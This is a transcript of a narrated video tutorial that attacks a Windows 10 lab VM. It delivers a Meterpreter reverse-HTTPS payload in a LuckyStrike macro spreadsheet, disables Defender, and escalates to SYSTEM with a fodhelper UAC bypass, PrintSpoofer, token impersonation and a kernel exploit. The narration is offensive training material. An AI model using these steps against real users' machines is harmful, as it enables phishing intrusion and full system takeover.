Welcome to this red team operations on Windows virtual machine. And on the left I have my terminal and I'm running Kali as my host, and I have my Oracle VirtualBox running, and the virtual machine Windows 10 is also running. And let's open up a browser. And let's search for Lucky Strike. So Lucky Strike is a binary which helps us to run macros. Install macros in an xlsx format and encode our payload in that. So the payload may be generated by MSFvenom or by any other means. And let's open up the GitHub repository. And this is the GitHub repository, and let's download the zip. Let's go to code, and we can git clone it or we can download the zip. And the zip will be downloaded. And we need to extract the zip on our desktop. And once extracted, we can see the file. Let's close the browser and let's open up Lucky Strike, and let's open payloads. So these are the previous payloads which I had created using Empire, using Metasploit and Lucky Strike. And this is the Invoke-Obfuscation module which is required to obfuscate our payload. And this is the luckystrike.ps1 script, PowerShell script. And let's open up our browser again. Let me show you the Invoke-Obfuscation GitHub repository where you need to download the Invoke-Obfuscation module and import the module in the PowerShell. I won't be going through that, but it's fairly simple. We need to just download the zip, extract it, and import the module Invoke-Obfuscation and add it to the path. So we downloaded the zip. And we extracted it, and this is the Invoke-Obfuscation, all the binaries in Invoke-Obfuscation. And so these were the payloads. Now let's go to PowerShell and run it as an administrator. So let's click on S and PowerShell will spawn up. And let's go to CD users, C users, and Arvinda, and desktop, Lucky Strike or Lucky, and go to Lucky Strike. So let's do a dir, and we're still in Lucky Strike, and let's go to that directory and let's list the directory, and let's run luckystrike.ps1. And we have our antivirus threat protection, so we need to disable it. Let's go to Defender, So let's open up Microsoft Defender and let's disable our virus and threat protection, and let's disable real-time protection, and let's click on yes. So let's run luckystrike.ps1 again. So this will prompt a number of times, so just hit R and enter. And we can see the Lucky Strike console. Before creating this, let me minimize that. We need to create our MSFvenom payload. So let's create MSFvenom payload. So let's not PHP Meterpreter reverse TCP. We need to create Windows Meterpreter reverse HTTPS, and Windows is the platform, Meterpreter is the payload type, and reverse HTTPS is the connection type. And let's click lhost as our host IP, and lport as 4444, and file type is exe. We can use encoding, but I'll be showing without the encoding part. And let's save this as payload.exe, or we can save it as sysinfo system info.exe. And system information, yeah, now we'll save it as system info.exe, and let's create the payload. Hit enter. And the payload is created. Now we'll copy this sysinfo payload to our documents folder. In the documents folder there is a folder called payload, so we will copy it there, and we'll traverse the directory of documents and to payload, and go to payloads, and we list the files, and we see systeminfo.exe, and start up our Python HTTP server on port 80. Now let's go to our Windows machine, and let's go to our IP 172.20.10.13 and slash systeminfo.exe, and it will be downloaded. So a get request for HTTP server on success 200 is okay status. And let's close our Python HTTP server, and let's go to Lucky Strike and select payload options. Before payload options, let's select catalog options, and let's add a payload to catalog. Select one, and the title is what we can give is new MSFvenom payload. Let's hit enter. Target IP optional. This is optional. Description is optional, and it will. We have to choose the payload type. So the payload type is an executable 3, and the path. So C users, capital users, users, and Arvinda, and downloads. So downloads, and So the name of the file was systeminfo.exe, and let's hit enter, and the payload was added. Let's go back. Let's go to select a payload, and it's asking document type you wish to make, xlsx, and select a payload. So new MSFvenom payload 3, option 3, and certutil infection method is certutil, and it's done. And let's go back, and let's select file options. So let me just maximize that. Yes, file options and generate new file, and your file will be generated in xlsx format. And you can see this file path which has been made and created. The file has been created. Let's go to payloads, and let's rename this infected file as let's rename this. So go to rename, and let's rename this as new file. Not file, just let's rename this as new file. And let's close Lucky Strike and PowerShell, and let's close let's minimize this and run MSF console. And MSF console will load, and Metasploit framework console is starting up. And let's clear the screen, and let's use exploit slash multi slash handler, and let's configure this multi handler, and let's set payload as Windows, set payload as the above one, which is Windows Meterpreter reverse HTTPS. Let's copy that and let's paste it and hit enter, and let's go to options. So we have to set our L port as well as L host. So set L host as 172.20.10.13, and set L port as 4444, and let's run this Metasploit module. And this will basically start up a handler for the payload Windows Meterpreter reverse HTTPS on the local host, on our local host, and with the port 4444. And we are waiting for the Metasploit to start the reverse TCP reverse HTTPS handler. Once it starts, we can trigger the payload. Let's double click on payload and enable content. So yeah, the Meterpreter session will be created, and yes, we got a Meterpreter session. And let's get a shell. So process created, and let's do who am I. So it will give Microsoft Windows slash my name, and we can do ipconfig, or we can do dir to list the directories. And let's do ipconfig slash all to see all the IP addresses configuration, and network configuration is this with the IP address 10.0.2.2. So this is our IP address, and let's exit out of this shell. And let's write down whatever we did till now. So initial access by payload, right? Initial access using macro deliverable by phishing. So we can use our technique, which is phishing, and initial access is our tactic. So we're using the MITRE attack framework, which is using tactic, techniques, and procedure. And before that, we have to create the payload. Created a Metasploit payload using MSFvenom. So first we created a Metasploit payload using MSFvenom on port 4444, and we created a macro of xlsx file type, and using MSFvenom payload. So using MSFvenom payload, we created a macro of xlsx type, and we used Lucky Strike for that. So we used Lucky Strike. I mean, we created in Lucky Strike. So we created a macro of xlsx file type using MSFvenom payload in Lucky Strike, and the user clicks on the macro and enable the content. So this is our initial access tactic by using a technique of phishing. We can able to deliver the macro, and so let's delete this, and let's do initial access, right? Initial access by payload delivered. So this much we have done, and we got the Meterpreter session. Now let's go to another technique, which is now privilege escalation. So let's type in privilege escalation technique, and the first technique is kernel exploit. So kernel exploits, which is for both Windows as well as Linux, but in this we will see about the Windows exploit, and the second one is token impersonation. So if we have SE token impersonate privilege, if we have that privilege, then we can do token impersonation. And the third technique is bypass UAC. So these three techniques will see to do privilege escalation. And so let's go and let's test our privilege escalation techniques. Let's search for exploit suggester, right? We search for a local exploit suggester. Oh, I think we have to background this session. So let's background this session and let's search for exploit suggester. Let me copy that down. And let's do use 0. So use 0 and let's do options. And we see the options. Okay, let's do options and we have to set session as 1. So we select our first session and we run the exploit. So we run our local exploits register. It is collecting all the exploits, right? So this might take a bit of time to run. So essentially, it will suggest all the exploits, whichever is positive in green and whichever is in negative in red, and it will collect all the exploits and it will run against our session, Meterpreter session. And so it has to collect around 2607 exploits. And let's once check our methodology.txt. So yeah, kernel exploits. So we can do kernel exploits using windows-exploit-suggester.python file, right? Windows exploit suggester.python file, and we can do token impersonation using a Metasploit module. So we can do show tokens and we can do impersonate token NTLM slash administrator, and we can do bypass UAC by local exploit suggester, which we are currently conducting. And are all the procedures, right? Procedures for privilege escalation. So sorry. And let's see all the positive things which are the exploit which are suggested, and let's use this module, right? Let's use exploit slash windows slash local bypass UAC fodhelper, and let's see the options. So let's see the options again, and let's set the session as 1. Let's select the first session and let's run this exploit. So it will bypass the user access control. So it's failing because we are already using that handler, right? Let this execute, and let's clean up the registry keys and let it clean up the registry keys, and further we will change the handler. So we'll see the options, and we will set our L port as 1234, and let's run the exploit. And the TCP handler, this time it correctly listens on the port 1234, and Okay, I think session won't be created now, right? Yes, the session was not created. I think we did a mistake somewhere. Let's get privs. Let's okay. We need to go to session and we'll see the sessions. So we need to go to our Meterpreter shell and do get privs, and it's not here, right? Oh, sorry, I have to do sessions, and let's see the sessions. And there's only one session. Sessions one. Select the first session and let's do get privs now. So we do not see SE impersonate privileges. So we have done something wrong in the previous section, right? Let me figure it out. So this was our exploit for potentially bypassing UAC controls and getting the privilege escalation done. So we did not get SE impersonate privileges. Let's background this session and let's do options again. And every option is set. Payload option is set. Windows Meterpreter reverse TCP and lhost is set. Lport is set. And let's do sessions, and we do not have a session. Let's do sessions one. I think we need to migrate to x64, right, from x86. So let's do a process ps to list the process running on the Windows virtual machine, and we see Microsoft MS Edge. It's 6728. So let's migrate to 6728. Let's copy 6728 and let's type in migrate space 6728 to migrate to that process of x64. And I figured out what was wrong. So I restarted the VM and did all those things till the initial exploit. And I set the session as 1 and ran the bypass UAC, which is Windows local bypass UAC fodhelper. And I got the privs, right? So I had to restart my Windows to get this SE impersonate privilege. So now what we can do is essentially we can check for methodology.txt, and we have we can now either use Metasploit module to get a system shell, or with SC impersonate privileges. So we can either use Metasploit module, or we can use something like God Potato or Rotten Potato or PrintSpoofer.exe. So that's what I'm typing now. It's either we use Metasploit module or we use Code Potato or PrintSpoofer.exe. So let's get this out in separate lines. So bypass UAC is done. So this is done, and token impersonation is to do. And let's save this. And now what we can do is essentially we can go to a browser, right, and search for PrintSpoofer.exe binary and transfer it to our Meterpreter session, and then run that binary, right? So we can go to Firefox, and in this browser you type printspoofer.exe, and we hit enter, and we go to this GitHub repository. And we find this GitHub repository. Let's go to releases, and because Windows 10 is both x86 and x64, we can download 64-bit itself. Let's click on printspoofer64.exe, and it will be downloaded. So we already have the file, so let's delete the newly downloaded file or binary. So let's delete this, and let's delete printspoofer.exe. Yes, let's close this window, and let's close this window also, and let's jump back to our terminal, and let's do cp. It was there in the downloads, and so copy the printspoofer.exe in downloads. If I can type downloads, DOWN, oh sorry, DOWN downloads, yeah. And let's search for printspoofer.exe. So printspoofer.exe, and let's copy that as print.exe, and we copied it to our payloads, and let's start Python 3. Oh, it became a Python, sorry, just Python 3. So Python 3, and so not this, Python 3-m http.server port 80, and hit enter, and let's get a shell. So let's get a shell, and process will be created, and let's go to wget, or let's first catch the directory, right? Let's go to temp. So temp is not found. Let's go to users, and so C users, sorry, C users, and username and desktop, and let's do a wget 172.20.10.2 or .13 / print.exe, and wget is not installed in this. Let's do a cert util url cache, F file and split, and let's do 172. Let's copy this down, right? And let's hit enter. And the request is not supported. Okay, let's go to VM and download it via browser, right? And let's exit and let's go to our VM and go to our browser, go to MSH browser, and let's search sorry, my recording running. Yeah, it's my recording is running. Let's search for 172.20.10.13 slash print.exe, and the exe will be downloaded. And let's go to cd data slash downloads. Oh, sorry, we need to get a shell first. And let's go to users Advinda first, and let's go to downloads, fetch directory downloads, always with this downloads, not downloads, sorry, it's downloads. And we go to downloads and we execute PrintSpoofer.exe. Let's clear out the screen for once. Let's do a dir. Let's list a directory. Let's do a dir, and still clearing out. And we can see print.exe, and let's do /print.exe. So I don't exactly know the exact command. So let's go to the GitHub repository and let's do PrintSpoofer.exe, right? Let's clear this gibberish and let's go to PrintSpoofer.exe. Let's go to the GitHub repository. And we see this GitHub repository and we have to check how to run this. So we have an example and we copy the command, exact command, and we go to this command prompt and we go to the shell and we hit this O. So the forward slash, it should be a backward slash, right? So we do a dot backward slash and then the command, and we check who am I, and we get anti-authority system, and we are root on this shell, or we are the administrative user on the shell, and we can do ipconfig/all. Oh, sorry, it should be ipconfig/all, and we can see our IP configurations. So we can check it is 10.0.2.2, and we exit out of the shell as well. So we saw one of this how one of this privilege escalation techniques where we used token impersonation. We used PrintSpoofer.exe to do token impersonation and get the privilege as administrative user. And now we can check the Metasploit module, right? So this is done, and this token impersonation is also done, and we save this, and let's go to the shell and let's do load incognito mode, incognito mode is running. And let's do list tokens dash u to list all the token of the users, and it will list all the tokens which are available. So we need the anti-authority system. So for that we can do impersonate underscore token, and we can give double quotes, and we can paste anti-authority system. And successfully impersonated the user anti-authority system, and let's get the shell. So let's do who am I, and we get an anti-authority system. So we did both the methods, right? Let's go to methodology.txt, and even this method is done using Metasploit's inbuilt module to get a system shell. So this is also done, and go to kernel exploits, and this is to do. So I will show now how to do a kernel exploitation. So basically this is not a recommended while doing actual red team operations, because it can crash your Windows virtual machine or Windows machine. So let's do Windows exploit suggester. So I think I have this WSNG. It should be there in aptitude repository manager, but let's visit this Windows exploit suggester. And we can download this, though this is the repository. So let me see quickly how to run this. So we have to do a git clone. I think I have this in my local as WES. Yes, I have it in my local. And so sudo apt install WES Windows Exploit Suggester. Let me type in my password, and unable to locate the package WES. So I think it's WESNG. Well, let's run apt-get install, and the same error. I think it's WSP. Okay, will not think about that again. Let's do WS dash dash help, and we get this help page. And let's do update WS dash dash update dash WS. Okay, it's throwing an error, and let's do ls, and let's first say WS, and yeah, I think we need to do WS dash dash update, just update, right? Here we can see that previously I had run a command called systeminfo.txt, and I saved that to prevesc1.txt. And let's do systeminfo.txt, and let's go to our Meterpreter session, and let's type in sessions. Oh, sorry, not sessions. We are already in Meterpreter session. We need to background because we are in root privilege or administrator privileges. We need to go to session 1, So we select session 1, and now let's do get UID, and it's unprivileged user, and let's get the shell. And we can do system info. This will essentially give us the system information, and we need to save this as systeminfo.txt or any other file. And we got this information, and now let's search how to run wesng, and let's copy this system info, and let's paste it, and let's save it. And it's showing a different thing. Let's type in correctly wesng, and it shows some of the examples. And let's go to wes system info sysinfo.txt. Let's not save it to a file right now. Okay, so let's just do that, and we have to do a wes update first. So it was just update, right? So I was doing a ws update ws again, so that's why it was failing. So we need to update it first, and let's do ws sysinfo.txt, and it's loading all the system information, and it suggested a lot of exploits. And let's do sysinfo.exe to privesc.txt, and it will be saved to this file. And let's see, many privilege escalation, as well as denial of service, remote code execution, a lot of exploits, right? We need to find the kernel exploits in this. So we can do it manually, or we can do it using grep search, right? So let's do an ls, and let's do cat privesc one, not privesc one, just privesc.txt, and let's grep for privilege, and we get a lot of privileges, escalation of privileges. And let's see, so cat privilege.txt, and we have to search for something like so this is elevation of privilege vulnerability, and we're looking from the top till the bottom, and remote code execution, elimination of privileges, elevation of privileges. And yeah, we see a lot of exploits and cves. So cve is basically common vulnerabilities and exposures, right? And we see a lot of cves, 2022, 2023. We're manually finding it out. remote code execution, elevation of privileges, and we did not find a single kernel exploit till now, and we're manually searching it. Now let's try to search it using grep. Let's do kernel, and yes, we get a lot of kernel elevation of privilege vulnerability. And let's search how to get how to get how to get the lines before and last 10 lines and the next 5 lines in grep search, right? So we have to do after and before command, after and before options, and after 5 and before 10, and we hit enter, and we get all this kernel exploits, right? This is how to grep through any file. So we see a lot of information here as well, and let's search for one of the CVEs, right? So basically what you will essentially do is you will search for that particular CVE, and if it has a .exe file, then you got lucky and you run the .exe file and get the privilege as administrator. I mean, this method is usually not recommended, but let's search it, and let's do Windows exploit .exe and file. Yeah, so you get this all this exploits binaries, and let's search for a different way. Let's do site colon github.com. So site colon github.com is a way to tell the browser essentially only show github.com profile URL. And let's see, okay, we didn't find a .exe file. So Windows kernel elevation of privilege vulnerability, and so this is the exploit. Let's go back, and let's search for another CVE, right? This looks promising, subsystem for Linux. Let's search for that in github.com. So let's paste that, and let's search for that, hit enter, and we get this GitHub repository again. And let's click on that, and we didn't get anything. So essentially what we can do is we can do Windows kernel exploit, Windows 10 kernel exploit, and we get this GitHub repository secwiki, and let's click on that. So we all basically have all these exploits, and it's for your job to run this .exe files and see whether it is working or not. So kernel exploits can be tricky. I won't be demonstrating that how to, I mean, I won't be demonstrating on my Windows VM, but it's your job to search for the correct exploit and run it. And let's do CVE. Let's search some of the CVs, and let's get an idea whether Windows Exploit Suggester suggest the CVs. So I think these are all very old CVs, right? So they won't be there. It is showing 2026, 2022, 2023, and 2018, 2017 is not present. So this is basically how to grep for all, how to recursively search for all the, how to search for case insensitive search. Using grep we can do a lot of searching through files, searching through the content of the files, right? So let's go to some random.exe and let's download that binary file and let's try running it, and let's see if that exploit worked. And we downloaded an x64.exe, a random one. I don't think it'll work, but let's see. Let's copy that down from downloads, and the name is x64.exe, and we save it as x64.exe. And let's start Python HTTP server, a module called HTTP server, and let's go to our Windows VM and download that x64.exe. Let's open up our browser. And this is the basic method of transferring a file from Windows to, from Linux to Windows, right? From Windows to Linux, you can start a SMB server, or yeah, and that's to go to downloads, and let's do a dir to do the directory listing, and let's run x64.exe, and it's not recognized. Oh, we have to do a dot backward slash x64.exe, and it gives us the usage. So let's do dot slash x64.exe and the command, right? So let's do dot slash x64.exe, and who am I? And it just says some exploit. It doesn't actually give us the command. I don't think running it. I think we have to add the admin as a user, right? So let's copy this exact command, and we add this admin as the user. So I don't know what to do next. So if you don't know what to do next, let's go to Gemini and let's ask what to do, right? Let's go to gemini.google.com. Here's the shortcut, and let's see. What does this do, right? What this does, right? So basically it will give the information, right? That it is adding this admin as the username and password of the net users group, and we have to change our local group to administrator, right? And let's paste it. Let's do a ./x64.exe, and let's paste that. Let's add administrator local group administrator. Let's add admin to the local group administrator, and now we don't know what to do next. So let's ask switch user to admin user, right? I think it will give run as.exe, right? That is one of the method. So yeah, it gave run as. I don't think it will work, but it's worth trying. Let's go to command prompt and run as.exe user admin cmd.exe. And let's do who am I? Let's run it again. I mean, it's prompting for the password, but it's not taking any password. So if we do who am I, we'll get the same user. So this we have to find the exact binaries which will run, and we need to do our privilege escalation of kernel experts by finding the right binaries, and that can be done by Windows expert suggestor. And let's try it once in our VM. So run as user admin cmd.exe, and let's type in the password as admin, and it's erroring out. The username or the password is incorrect, so we just added it. So I think the binary failed, so the ./x64.exe failed, and that is why it is important to get the right binary of the Windows 10 kernel exploits. So now let's go to methodology.txt. So basically what we did was, right now we did kernel exploits and we did Windows exploit suggester, and we did bypass UAC, which was done by local exploit suggester of the Meterpreter module, and we did a token impersonation after bypassing UAC using Meterpreter module or the PrintSpoofer.exe, and this was all privilege escalation. So the totally to sum it up, we created a Meterpreter payload using MSFvenom on port 4444, and we created a macros of xlsx file type using MSFvenom in Lucky Strike, and macro can be delivered by phishing, and the user click on the macro and enable the content, and initial access is by payload the delivered. And the privilege escalation techniques are these three, where we have done bypass UAC, token impersonation, and kernel exploits, right? So that's it from my side, and thank you. Subscribe to this channel, like the video, click the bell icon,